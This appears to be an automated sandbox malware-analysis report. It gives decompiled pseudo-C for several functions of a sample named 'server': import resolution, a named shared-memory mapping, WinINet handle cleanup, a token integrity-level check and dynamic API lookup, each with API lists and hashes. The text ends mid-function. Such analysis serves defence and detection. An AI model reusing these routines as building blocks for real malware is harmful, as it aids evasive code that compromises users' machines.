              control_flow_graph 181 2ce7fc5-2ce802a 182 2ce802c-2ce8046 RaiseException 181->182 183 2ce804b-2ce8075 181->183 184 2ce81fb-2ce81ff 182->184 185 2ce807a-2ce8086 183->185 186 2ce8077 183->186 187 2ce8088-2ce8093 185->187 188 2ce8099-2ce809b 185->188 186->185 187->188 196 2ce81de-2ce81e5 187->196 189 2ce8143-2ce814d 188->189 190 2ce80a1-2ce80a8 188->190 194 2ce814f-2ce8157 189->194 195 2ce8159-2ce815b 189->195 192 2ce80aa-2ce80b6 190->192 193 2ce80b8-2ce80c5 LoadLibraryA 190->193 192->193 197 2ce8108-2ce8114 InterlockedExchange 192->197 193->197 198 2ce80c7-2ce80d7 193->198 194->195 199 2ce815d-2ce8160 195->199 200 2ce81d9-2ce81dc 195->200 205 2ce81f9 196->205 206 2ce81e7-2ce81f4 196->206 201 2ce813c-2ce813d FreeLibrary 197->201 202 2ce8116-2ce811a 197->202 214 2ce80d9-2ce80e5 198->214 215 2ce80e7-2ce8103 RaiseException 198->215 207 2ce818e-2ce819c GetProcAddress 199->207 208 2ce8162-2ce8165 199->208 200->196 201->189 202->189 210 2ce811c-2ce8128 LocalAlloc 202->210 205->184 206->205 207->200 209 2ce819e-2ce81ae 207->209 208->207 212 2ce8167-2ce8172 208->212 219 2ce81ba-2ce81bc 209->219 220 2ce81b0-2ce81b8 209->220 210->189 213 2ce812a-2ce813a 210->213 212->207 216 2ce8174-2ce817a 212->216 213->189 214->197 214->215 215->184 216->207 218 2ce817c-2ce817f 216->218 218->207 222 2ce8181-2ce818c 218->222 219->200 223 2ce81be-2ce81d6 RaiseException 219->223 220->219 222->200 222->207 223->200
              C-Code - Quality: 51%
              			E02CE7FC5(long _a4, long _a8) {
              				signed int _v8;
              				intOrPtr _v16;
              				LONG* _v28;
              				long _v40;
              				long _v44;
              				long _v48;
              				CHAR* _v52;
              				long _v56;
              				CHAR* _v60;
              				long _v64;
              				signed int* _v68;
              				char _v72;
              				signed int _t76;
              				signed int _t80;
              				signed int _t81;
              				intOrPtr* _t82;
              				intOrPtr* _t83;
              				intOrPtr* _t85;
              				intOrPtr* _t90;
              				intOrPtr* _t95;
              				intOrPtr* _t98;
              				struct HINSTANCE__* _t99;
              				void* _t102;
              				intOrPtr* _t104;
              				void* _t115;
              				long _t116;
              				void _t125;
              				void* _t131;
              				signed short _t133;
              				struct HINSTANCE__* _t138;
              				signed int* _t139;
              
              				_t139 = _a4;
              				_v28 = _t139[2] + 0x2ce0000;
              				_t115 = _t139[3] + 0x2ce0000;
              				_t131 = _t139[4] + 0x2ce0000;
              				_v8 = _t139[7];
              				_v60 = _t139[1] + 0x2ce0000;
              				_v16 = _t139[5] + 0x2ce0000;
              				_v64 = _a8;
              				_v72 = 0x24;
              				_v68 = _t139;
              				_v56 = 0;
              				asm("stosd");
              				_v48 = 0;
              				_v44 = 0;
              				_v40 = 0;
              				if(( *_t139 & 0x00000001) == 0) {
              					_a8 =  &_v72;
              					RaiseException(0xc06d0057, 0, 1,  &_a8);
              					return 0;
              				}
              				_t138 =  *_v28;
              				_t76 = _a8 - _t115 >> 2 << 2;
              				_t133 =  *(_t131 + _t76);
              				_a4 = _t76;
              				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
              				_v56 = _t80;
              				_t81 = _t133 + 0x2ce0002;
              				if(_t80 == 0) {
              					_t81 = _t133 & 0x0000ffff;
              				}
              				_v52 = _t81;
              				_t82 =  *0x2cea1c0; // 0x0
              				_t116 = 0;
              				if(_t82 == 0) {
              					L6:
              					if(_t138 != 0) {
              						L18:
              						_t83 =  *0x2cea1c0; // 0x0
              						_v48 = _t138;
              						if(_t83 != 0) {
              							_t116 =  *_t83(2,  &_v72);
              						}
              						if(_t116 != 0) {
              							L32:
              							 *_a8 = _t116;
              							L33:
              							_t85 =  *0x2cea1c0; // 0x0
              							if(_t85 != 0) {
              								_v40 = _v40 & 0x00000000;
              								_v48 = _t138;
              								_v44 = _t116;
              								 *_t85(5,  &_v72);
              							}
              							return _t116;
              						} else {
              							if(_t139[5] == _t116 || _t139[7] == _t116) {
              								L27:
              								_t116 = GetProcAddress(_t138, _v52);
              								if(_t116 == 0) {
              									_v40 = GetLastError();
              									_t90 =  *0x2cea1bc; // 0x0
              									if(_t90 != 0) {
              										_t116 =  *_t90(4,  &_v72);
              									}
              									if(_t116 == 0) {
              										_a4 =  &_v72;
              										RaiseException(0xc06d007f, _t116, 1,  &_a4);
              										_t116 = _v44;
              									}
              								}
              								goto L32;
              							} else {
              								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
              								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
              									_t116 =  *(_a4 + _v16);
              									if(_t116 != 0) {
              										goto L32;
              									}
              								}
              								goto L27;
              							}
              						}
              					}
              					_t98 =  *0x2cea1c0; // 0x0
              					if(_t98 == 0) {
              						L9:
              						_t99 = LoadLibraryA(_v60); // executed
              						_t138 = _t99;
              						if(_t138 != 0) {
              							L13:
              							if(InterlockedExchange(_v28, _t138) == _t138) {
              								FreeLibrary(_t138);
              							} else {
              								if(_t139[6] != 0) {
              									_t102 = LocalAlloc(0x40, 8);
              									if(_t102 != 0) {
              										 *(_t102 + 4) = _t139;
              										_t125 =  *0x2cea1b8; // 0x0
              										 *_t102 = _t125;
              										 *0x2cea1b8 = _t102;
              									}
              								}
              							}
              							goto L18;
              						}
              						_v40 = GetLastError();
              						_t104 =  *0x2cea1bc; // 0x0
              						if(_t104 == 0) {
              							L12:
              							_a8 =  &_v72;
              							RaiseException(0xc06d007e, 0, 1,  &_a8);
              							return _v44;
              						}
              						_t138 =  *_t104(3,  &_v72);
              						if(_t138 != 0) {
              							goto L13;
              						}
              						goto L12;
              					}
              					_t138 =  *_t98(1,  &_v72);
              					if(_t138 != 0) {
              						goto L13;
              					}
              					goto L9;
              				}
              				_t116 =  *_t82(0,  &_v72);
              				if(_t116 != 0) {
              					goto L33;
              				}
              				goto L6;
              			}


































              0x02ce7fd4
              0x02ce7fea
              0x02ce7ff0
              0x02ce7ff2
              0x02ce7ff7
              0x02ce7ffd
              0x02ce8002
              0x02ce8005
              0x02ce8013
              0x02ce801a
              0x02ce801d
              0x02ce8020
              0x02ce8021
              0x02ce8024
              0x02ce8027
              0x02ce802a
              0x02ce802f
              0x02ce803e
              0x00000000
              0x02ce8044
              0x02ce804e
              0x02ce8058
              0x02ce805d
              0x02ce805f
              0x02ce8069
              0x02ce806c
              0x02ce806f
              0x02ce8075
              0x02ce8077
              0x02ce8077
              0x02ce807a
              0x02ce807d
              0x02ce8082
              0x02ce8086
              0x02ce8099
              0x02ce809b
              0x02ce8143
              0x02ce8143
              0x02ce814a
              0x02ce814d
              0x02ce8157
              0x02ce8157
              0x02ce815b
              0x02ce81d9
              0x02ce81dc
              0x02ce81de
              0x02ce81de
              0x02ce81e5
              0x02ce81e7
              0x02ce81f1
              0x02ce81f4
              0x02ce81f7
              0x02ce81f7
              0x00000000
              0x02ce815d
              0x02ce8160
              0x02ce818e
              0x02ce8198
              0x02ce819c
              0x02ce81a4
              0x02ce81a7
              0x02ce81ae
              0x02ce81b8
              0x02ce81b8
              0x02ce81bc
              0x02ce81c1
              0x02ce81d0
              0x02ce81d6
              0x02ce81d6
              0x02ce81bc
              0x00000000
              0x02ce8167
              0x02ce816a
              0x02ce8172
              0x02ce8187
              0x02ce818c
              0x00000000
              0x00000000
              0x02ce818c
              0x00000000
              0x02ce8172
              0x02ce8160
              0x02ce815b
              0x02ce80a1
              0x02ce80a8
              0x02ce80b8
              0x02ce80bb
              0x02ce80c1
              0x02ce80c5
              0x02ce8108
              0x02ce8114
              0x02ce813d
              0x02ce8116
              0x02ce811a
              0x02ce8120
              0x02ce8128
              0x02ce812a
              0x02ce812d
              0x02ce8133
              0x02ce8135
              0x02ce8135
              0x02ce8128
              0x02ce811a
              0x00000000
              0x02ce8114
              0x02ce80cd
              0x02ce80d0
              0x02ce80d7
              0x02ce80e7
              0x02ce80ea
              0x02ce80fa
              0x00000000
              0x02ce8100
              0x02ce80e1
              0x02ce80e5
              0x00000000
              0x00000000
              0x00000000
              0x02ce80e5
              0x02ce80b2
              0x02ce80b6
              0x00000000
              0x00000000
              0x00000000
              0x02ce80b6
              0x02ce808f
              0x02ce8093
              0x00000000
              0x00000000
              0x00000000

              APIs
              • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02CE803E
              • LoadLibraryA.KERNELBASE(?), ref: 02CE80BB
              • GetLastError.KERNEL32 ref: 02CE80C7
              • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02CE80FA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: ExceptionRaise$ErrorLastLibraryLoad
              • String ID: $$@MqtNqt
              • API String ID: 948315288-516465142
              • Opcode ID: 7da4bf1450c8086cdef7ed0b8a9a88b810b690f3bea505fc5de18cf8489d7761
              • Instruction ID: 770d700859936e1d158c761567be62f8582255c0a2834356631330105407679b
              • Opcode Fuzzy Hash: 7da4bf1450c8086cdef7ed0b8a9a88b810b690f3bea505fc5de18cf8489d7761
              • Instruction Fuzzy Hash: AF81F971A40605EFDF20CF99DC85BAEB7F5BB88310F548629E906E7250EB70EA45CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 74%
              			E02CE415A(intOrPtr __edx, void** _a4, void** _a8) {
              				intOrPtr _v8;
              				struct _FILETIME* _v12;
              				short _v56;
              				struct _FILETIME* _t12;
              				intOrPtr _t13;
              				void* _t17;
              				void* _t21;
              				intOrPtr _t27;
              				long _t28;
              				void* _t30;
              
              				_t27 = __edx;
              				_t12 =  &_v12;
              				GetSystemTimeAsFileTime(_t12);
              				_push(0x192);
              				_push(0x54d38000);
              				_push(_v8);
              				_push(_v12);
              				L02CE82D4();
              				_push(_t12);
              				_v12 = _t12;
              				_t13 =  *0x2cea348; // 0x256d5a8
              				_t5 = _t13 + 0x2ceb7b4; // 0x5258d5c
              				_t6 = _t13 + 0x2ceb644; // 0x530025
              				_push(0x16);
              				_push( &_v56);
              				_v8 = _t27;
              				L02CE7F3A();
              				_t17 = CreateFileMappingW(0xffffffff, 0x2cea34c, 4, 0, 0x1000,  &_v56); // executed
              				_t30 = _t17;
              				if(_t30 == 0) {
              					_t28 = GetLastError();
              				} else {
              					if(GetLastError() == 0xb7) {
              						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
              						if(_t21 == 0) {
              							_t28 = GetLastError();
              							if(_t28 != 0) {
              								goto L6;
              							}
              						} else {
              							 *_a4 = _t30;
              							 *_a8 = _t21;
              							_t28 = 0;
              						}
              					} else {
              						_t28 = 2;
              						L6:
              						CloseHandle(_t30);
              					}
              				}
              				return _t28;
              			}













              0x02ce415a
              0x02ce4162
              0x02ce4166
              0x02ce416c
              0x02ce4171
              0x02ce4176
              0x02ce4179
              0x02ce417c
              0x02ce4181
              0x02ce4182
              0x02ce4185
              0x02ce418a
              0x02ce4191
              0x02ce419b
              0x02ce419d
              0x02ce419e
              0x02ce41a1
              0x02ce41bd
              0x02ce41c3
              0x02ce41c7
              0x02ce4215
              0x02ce41c9
              0x02ce41d6
              0x02ce41e6
              0x02ce41ee
              0x02ce4200
              0x02ce4204
              0x00000000
              0x00000000
              0x02ce41f0
              0x02ce41f3
              0x02ce41f8
              0x02ce41fa
              0x02ce41fa
              0x02ce41d8
              0x02ce41da
              0x02ce4206
              0x02ce4207
              0x02ce4207
              0x02ce41d6
              0x02ce421c

              APIs
              • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,02CE25B1,?,?,4D283A53,?,?), ref: 02CE4166
              • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02CE417C
              • _snwprintf.NTDLL ref: 02CE41A1
              • CreateFileMappingW.KERNELBASE(000000FF,02CEA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 02CE41BD
              • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,02CE25B1,?,?,4D283A53,?), ref: 02CE41CF
              • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 02CE41E6
              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,02CE25B1,?,?,4D283A53), ref: 02CE4207
              • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,02CE25B1,?,?,4D283A53,?), ref: 02CE420F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
              • String ID: @MqtNqt
              • API String ID: 1814172918-2883916605
              • Opcode ID: ac6ce74ec354835c605e086cc3d2a8e085ab27af51c81ea8dbc61d3f7a5e49b5
              • Instruction ID: 1f9f78eb2168ace40a65aa9300802b1f8ecf476fd687c39539609ae8f4894f8a
              • Opcode Fuzzy Hash: ac6ce74ec354835c605e086cc3d2a8e085ab27af51c81ea8dbc61d3f7a5e49b5
              • Instruction Fuzzy Hash: 072184B2A80204FBDF25EB64DC05F9E77B9ABC8754F150121F60AEB2D0D7709A15CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 93%
              			E02CE4BE7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
              				void* _t17;
              				void* _t18;
              				void* _t19;
              				void* _t20;
              				void* _t21;
              				intOrPtr _t24;
              				void* _t37;
              				void* _t41;
              				intOrPtr* _t45;
              
              				_t41 = __edi;
              				_t37 = __ebx;
              				_t45 = __eax;
              				_t16 =  *((intOrPtr*)(__eax + 0x20));
              				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
              					E02CE16B2(_t16, __ecx, 0xea60);
              				}
              				_t17 =  *(_t45 + 0x18);
              				_push(_t37);
              				_push(_t41);
              				if(_t17 != 0) {
              					InternetSetStatusCallback(_t17, 0);
              					InternetCloseHandle( *(_t45 + 0x18)); // executed
              				}
              				_t18 =  *(_t45 + 0x14);
              				if(_t18 != 0) {
              					InternetSetStatusCallback(_t18, 0);
              					InternetCloseHandle( *(_t45 + 0x14));
              				}
              				_t19 =  *(_t45 + 0x10);
              				if(_t19 != 0) {
              					InternetSetStatusCallback(_t19, 0);
              					InternetCloseHandle( *(_t45 + 0x10));
              				}
              				_t20 =  *(_t45 + 0x1c);
              				if(_t20 != 0) {
              					CloseHandle(_t20);
              				}
              				_t21 =  *(_t45 + 0x20);
              				if(_t21 != 0) {
              					CloseHandle(_t21);
              				}
              				_t22 =  *((intOrPtr*)(_t45 + 8));
              				if( *((intOrPtr*)(_t45 + 8)) != 0) {
              					E02CE61DA(_t22);
              					 *((intOrPtr*)(_t45 + 8)) = 0;
              					 *((intOrPtr*)(_t45 + 0x30)) = 0;
              				}
              				_t23 =  *((intOrPtr*)(_t45 + 0xc));
              				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
              					E02CE61DA(_t23);
              				}
              				_t24 =  *_t45;
              				if(_t24 != 0) {
              					_t24 = E02CE61DA(_t24);
              				}
              				_t46 =  *((intOrPtr*)(_t45 + 4));
              				if( *((intOrPtr*)(_t45 + 4)) != 0) {
              					return E02CE61DA(_t46);
              				}
              				return _t24;
              			}












              0x02ce4be7
              0x02ce4be7
              0x02ce4be9
              0x02ce4beb
              0x02ce4bf2
              0x02ce4bf9
              0x02ce4bf9
              0x02ce4bfe
              0x02ce4c01
              0x02ce4c08
              0x02ce4c11
              0x02ce4c15
              0x02ce4c1a
              0x02ce4c1a
              0x02ce4c1c
              0x02ce4c21
              0x02ce4c25
              0x02ce4c2a
              0x02ce4c2a
              0x02ce4c2c
              0x02ce4c31
              0x02ce4c35
              0x02ce4c3a
              0x02ce4c3a
              0x02ce4c3c
              0x02ce4c47
              0x02ce4c4a
              0x02ce4c4a
              0x02ce4c4c
              0x02ce4c51
              0x02ce4c54
              0x02ce4c54
              0x02ce4c56
              0x02ce4c5d
              0x02ce4c60
              0x02ce4c65
              0x02ce4c68
              0x02ce4c68
              0x02ce4c6b
              0x02ce4c70
              0x02ce4c73
              0x02ce4c73
              0x02ce4c78
              0x02ce4c7c
              0x02ce4c7f
              0x02ce4c7f
              0x02ce4c84
              0x02ce4c89
              0x00000000
              0x02ce4c8c
              0x02ce4c93

              APIs
              • InternetSetStatusCallback.WININET(?,00000000), ref: 02CE4C15
              • InternetCloseHandle.WININET(?), ref: 02CE4C1A
              • InternetSetStatusCallback.WININET(?,00000000), ref: 02CE4C25
              • InternetCloseHandle.WININET(?), ref: 02CE4C2A
              • InternetSetStatusCallback.WININET(?,00000000), ref: 02CE4C35
              • InternetCloseHandle.WININET(?), ref: 02CE4C3A
              • CloseHandle.KERNEL32(?,00000000,00000102,?,?,02CE2248,?,?,747581D0,00000000,00000000), ref: 02CE4C4A
              • CloseHandle.KERNEL32(?,00000000,00000102,?,?,02CE2248,?,?,747581D0,00000000,00000000), ref: 02CE4C54
                • Part of subcall function 02CE16B2: WaitForMultipleObjects.KERNEL32(00000002,02CE7C47,00000000,02CE7C47,?,?,?,02CE7C47,0000EA60), ref: 02CE16CD
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
              • String ID:
              • API String ID: 2824497044-0
              • Opcode ID: 35c34bdc3ea7ccac1328436fd511d1efbf75ec3fcea5cc10e678dfe35314f3db
              • Instruction ID: e4f41addedd1509cc0af18b698aa7f84c176967829ffff5dc7281565045b534c
              • Opcode Fuzzy Hash: 35c34bdc3ea7ccac1328436fd511d1efbf75ec3fcea5cc10e678dfe35314f3db
              • Instruction Fuzzy Hash: DB111C76A00A58ABCE34AFAADD84C1BB7EEFF942093550D18E18BD3611C734F9458A64
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 100%
              			E02CE5E40(long* _a4) {
              				long _v8;
              				void* _v12;
              				void _v16;
              				long _v20;
              				int _t33;
              				void* _t46;
              
              				_v16 = 1;
              				_v20 = 0x2000;
              				if( *0x2cea2fc > 5) {
              					_v16 = 0;
              					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
              						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
              						_v8 = 0;
              						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
              						if(_v8 != 0) {
              							_t46 = E02CE33DC(_v8);
              							if(_t46 != 0) {
              								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
              								if(_t33 != 0) {
              									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
              								}
              								E02CE61DA(_t46);
              							}
              						}
              						CloseHandle(_v12);
              					}
              				}
              				 *_a4 = _v20;
              				return _v16;
              			}









              0x02ce5e4d
              0x02ce5e54
              0x02ce5e5b
              0x02ce5e6f
              0x02ce5e7a
              0x02ce5e92
              0x02ce5e9f
              0x02ce5ea2
              0x02ce5ea7
              0x02ce5eb2
              0x02ce5eb6
              0x02ce5ec5
              0x02ce5ec9
              0x02ce5ee5
              0x02ce5ee5
              0x02ce5ee9
              0x02ce5ee9
              0x02ce5eee
              0x02ce5ef2
              0x02ce5ef8
              0x02ce5ef9
              0x02ce5f00
              0x02ce5f06

              APIs
              • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02CE5E72
              • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02CE5E92
              • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02CE5EA2
              • CloseHandle.KERNEL32(00000000), ref: 02CE5EF2
                • Part of subcall function 02CE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02CE62F6), ref: 02CE33E8
              • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02CE5EC5
              • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02CE5ECD
              • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02CE5EDD
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
              • String ID:
              • API String ID: 1295030180-0
              • Opcode ID: 3ec217021cf0bdd349a6d6012d848fa7477cb614105e15b7b591420e2a3f288e
              • Instruction ID: 6a819daeb31f9160c2faa346f4396dc5332e5d4f88f0b227df62718083eabb8c
              • Opcode Fuzzy Hash: 3ec217021cf0bdd349a6d6012d848fa7477cb614105e15b7b591420e2a3f288e
              • Instruction Fuzzy Hash: 57213675900249FFEF01EF90CC84EAEBBB9EB48308F1000A5E912A6151CB759B54EBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 64%
              			E02CE6675(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
              				intOrPtr _v8;
              				intOrPtr _t9;
              				intOrPtr _t13;
              				char* _t19;
              				char* _t28;
              				void* _t33;
              				void* _t34;
              				char* _t36;
              				void* _t38;
              				intOrPtr* _t39;
              				char* _t40;
              				char* _t42;
              				char* _t43;
              
              				_t34 = __edx;
              				_push(__ecx);
              				_t9 =  *0x2cea348; // 0x256d5a8
              				_t1 = _t9 + 0x2ceb516; // 0x253d7325
              				_t36 = 0;
              				_t28 = E02CE5815(__ecx, _t1);
              				if(_t28 != 0) {
              					_t39 = __imp__;
              					_t13 =  *_t39(_t28, _t38);
              					_v8 = _t13;
              					_t6 =  *_t39(_a4) + 1; // 0x5259601
              					_t40 = E02CE33DC(_v8 + _t6);
              					if(_t40 != 0) {
              						strcpy(_t40, _t28);
              						_pop(_t33);
              						__imp__(_t40, _a4);
              						_t19 = E02CE5063(_t33, _t34, _t40, _a8); // executed
              						_t36 = _t19;
              						E02CE61DA(_t40);
              						_t42 = E02CE4AC7(StrTrimA(_t36, "="), _t36);
              						if(_t42 != 0) {
              							E02CE61DA(_t36);
              							_t36 = _t42;
              						}
              						_t43 = E02CE2708(_t36, _t33);
              						if(_t43 != 0) {
              							E02CE61DA(_t36);
              							_t36 = _t43;
              						}
              					}
              					E02CE61DA(_t28);
              				}
              				return _t36;
              			}
















              0x02ce6675
              0x02ce6678
              0x02ce6679
              0x02ce6680
              0x02ce6687
              0x02ce668e
              0x02ce6692
              0x02ce6699
              0x02ce66a0
              0x02ce66a5
              0x02ce66ad
              0x02ce66b7
              0x02ce66bb
              0x02ce66bf
              0x02ce66c5
              0x02ce66ca
              0x02ce66d4
              0x02ce66da
              0x02ce66dc
              0x02ce66f3
              0x02ce66f7
              0x02ce66fa
              0x02ce66ff
              0x02ce66ff
              0x02ce6708
              0x02ce670c
              0x02ce670f
              0x02ce6714
              0x02ce6714
              0x02ce670c
              0x02ce6717
              0x02ce671c
              0x02ce6722

              APIs
                • Part of subcall function 02CE5815: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02CE668E,253D7325,00000000,00000000,?,775EC740,02CE3ECE), ref: 02CE587C
                • Part of subcall function 02CE5815: sprintf.NTDLL ref: 02CE589D
              • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,02CE3ECE,00000000,05259600), ref: 02CE66A0
              • lstrlen.KERNEL32(00000000,?,775EC740,02CE3ECE,00000000,05259600), ref: 02CE66A8
                • Part of subcall function 02CE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02CE62F6), ref: 02CE33E8
              • strcpy.NTDLL ref: 02CE66BF
              • lstrcat.KERNEL32(00000000,00000000), ref: 02CE66CA
                • Part of subcall function 02CE5063: lstrlen.KERNEL32(00000000,00000000,02CE3ECE,00000000,?,02CE66D9,00000000,02CE3ECE,?,775EC740,02CE3ECE,00000000,05259600), ref: 02CE5074
                • Part of subcall function 02CE61DA: RtlFreeHeap.NTDLL(00000000,00000000,02CE6383,00000000,?,00000000,00000000), ref: 02CE61E6
              • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02CE3ECE,?,775EC740,02CE3ECE,00000000,05259600), ref: 02CE66E7
                • Part of subcall function 02CE4AC7: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,02CE66F3,00000000,?,775EC740,02CE3ECE,00000000,05259600), ref: 02CE4AD1
                • Part of subcall function 02CE4AC7: _snprintf.NTDLL ref: 02CE4B2F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
              • String ID: =
              • API String ID: 2864389247-1428090586
              • Opcode ID: e8b0513337333bef4bed550500e34a7d6a7263454dd159b0b5d0d25531c8d804
              • Instruction ID: f2ef8ea58c9389204397835a6813708f1ddca8faefef2cf3414d3ca80131aa3d
              • Opcode Fuzzy Hash: e8b0513337333bef4bed550500e34a7d6a7263454dd159b0b5d0d25531c8d804
              • Instruction Fuzzy Hash: B7118633D11225AB8F12BBB8DCC4C6F37AE9E997683154116F906AB201DF74DD026BE1
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 350 401202-401214 call 4012e6 353 4012d5 350->353 354 40121a-40124f GetModuleHandleA GetProcAddress 350->354 355 4012dc-4012e3 353->355 356 401251-401265 GetProcAddress 354->356 357 4012cd-4012d3 call 401ba9 354->357 356->357 358 401267-40127b GetProcAddress 356->358 357->355 358->357 360 40127d-401291 GetProcAddress 358->360 360->357 362 401293-4012a7 GetProcAddress 360->362 362->357 363 4012a9-4012ba call 40110b 362->363 365 4012bf-4012c4 363->365 365->357 366 4012c6-4012cb 365->366 366->355
              C-Code - Quality: 100%
              			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
              				intOrPtr _v8;
              				_Unknown_base(*)()* _t29;
              				_Unknown_base(*)()* _t33;
              				_Unknown_base(*)()* _t36;
              				_Unknown_base(*)()* _t39;
              				_Unknown_base(*)()* _t42;
              				intOrPtr _t46;
              				struct HINSTANCE__* _t50;
              				intOrPtr _t56;
              
              				_t56 = E004012E6(0x20);
              				if(_t56 == 0) {
              					_v8 = 8;
              				} else {
              					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
              					_v8 = 0x7f;
              					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
              					 *(_t56 + 0xc) = _t29;
              					if(_t29 == 0) {
              						L8:
              						E00401BA9(_t56);
              					} else {
